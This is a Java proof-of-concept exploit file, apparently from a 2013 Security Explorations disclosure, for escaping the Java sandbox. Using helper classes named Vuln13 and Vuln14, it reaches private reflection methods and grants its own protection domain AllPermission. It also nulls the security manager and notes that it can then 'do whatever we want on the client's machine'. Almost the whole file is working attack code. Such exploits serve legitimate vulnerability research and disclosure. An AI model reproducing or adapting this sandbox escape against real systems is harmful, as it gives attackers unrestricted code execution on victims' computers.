/*## (c) SECURITY EXPLORATIONS    2013 poland                                #*/
/*##     http://www.security-explorations.com                                #*/

/* THIS SOFTWARE IS PROTECTED BY DOMESTIC AND INTERNATIONAL COPYRIGHT LAWS    */
/* UNAUTHORISED COPYING OF THIS SOFTWARE IN EITHER SOURCE OR BINARY FORM IS   */
/* EXPRESSLY FORBIDDEN. ANY USE, INCLUDING THE REPRODUCTION, MODIFICATION,    */
/* DISTRIBUTION, TRANSMISSION, RE-PUBLICATION, STORAGE OR DISPLAY OF ANY      */
/* PART OF THE SOFTWARE, FOR COMMERCIAL OR ANY OTHER PURPOSES REQUIRES A      */
/* VALID LICENSE FROM THE COPYRIGHT HOLDER.                                   */

/* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS    */
/* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,*/
/* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL    */
/* SECURITY EXPLORATIONS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, */
/* WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF  */
/* OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE     */
/* SOFTWARE.                                                                  */

import java.lang.*;
import java.lang.reflect.*;
import java.io.*;
import java.security.*;

public class Test implements PrivilegedAction {
 PrintWriter out;

 public void set_sm(PrintWriter out,Object sm) {
  try {
   ApiHelper.set_sm(sm);
  } catch(Throwable t) {
   t.printStackTrace(out);
  }
 }

 public void dowork(PrintWriter out) {
  try {
   out.println("Security manager = "+System.getSecurityManager());
  } catch(Throwable t) {
   t.printStackTrace(out);
  }
 }

 public Object run() {
  /* save original value of Security Manager                             */
  Object org_sm=System.getSecurityManager();

  /* set "security" field of java.lang.System class to null              */
  set_sm(out,null);

  dowork(out);

  /* restore original value of Security Manager                          */
  set_sm(out,org_sm);

  return null;
 }

 public Test(PrintWriter out) {
  try {
   this.out=out;
   out.println("Security manager = "+System.getSecurityManager());

   /* get private getProtectionDomain0 method of java.lang.Class          */
   Method gpd=Vuln13.get_method(out,Class.forName("java.lang.Class"),"getProtectionDomain0");
   Vuln14.set_accessible(out,gpd);

   /* get ProtectionDomain object for this class                          */
   Class clazz=getClass();
   Object pd=ApiHelper.invoke(clazz,gpd,new Object[0]);

   /* get private privateGetDeclaredFields method of java.lang.Class      */
   Method gdf=Vuln13.get_method(out,Class.forName("java.lang.Class"),"privateGetDeclaredFields");
   Vuln14.set_accessible(out,gdf);

   Object args[]=new Object[1];
   args[0]=new Boolean(false);

   /* get declared fields of java.security.ProtectionDomain class         */
   Field ftab[]=(Field[])ApiHelper.invoke(pd.getClass(),gdf,args);

   Field fp=null;

   /* lookup "permissions" field of java.security.ProtectionDomain class  */
   for(int i=0;i<ftab.length;i++) {
    if (ftab[i].getName().equals("permissions")) {
     fp=ftab[i];
     break;
    }
   }

   /* make "permissions" field accessible                                 */
   Vuln14.set_accessible(out,fp);

   /* save original value of "permissions" field                          */
   Object org_perms=ApiHelper.field_get(fp,pd);

   /* create ALL permissions object                                       */
   Class c=Class.forName("java.security.AllPermission");
   Object allperm=c.newInstance();

   c=Class.forName("java.security.Permissions");
   Object perms=c.newInstance();

   Class ctab[]=new Class[1];
   ctab[0]=Class.forName("java.security.Permission");

   Method add=c.getMethod("add",ctab);

   args=new Object[1];
   args[0]=allperm;

   ApiHelper.invoke(perms,add,args);

   /* set ALL permissions for this class' ProtectionDomain                */
   ApiHelper.field_set(fp,pd,perms);

   /* from now on we can do whatever we want on the client's machine      */
   AccessController.doPrivileged(this);

   /* restore original value of "permissions" field                       */
   ApiHelper.field_set(fp,pd,org_perms);
  } catch(Throwable t) {
   t.printStackTrace(out);
  }
 }
}
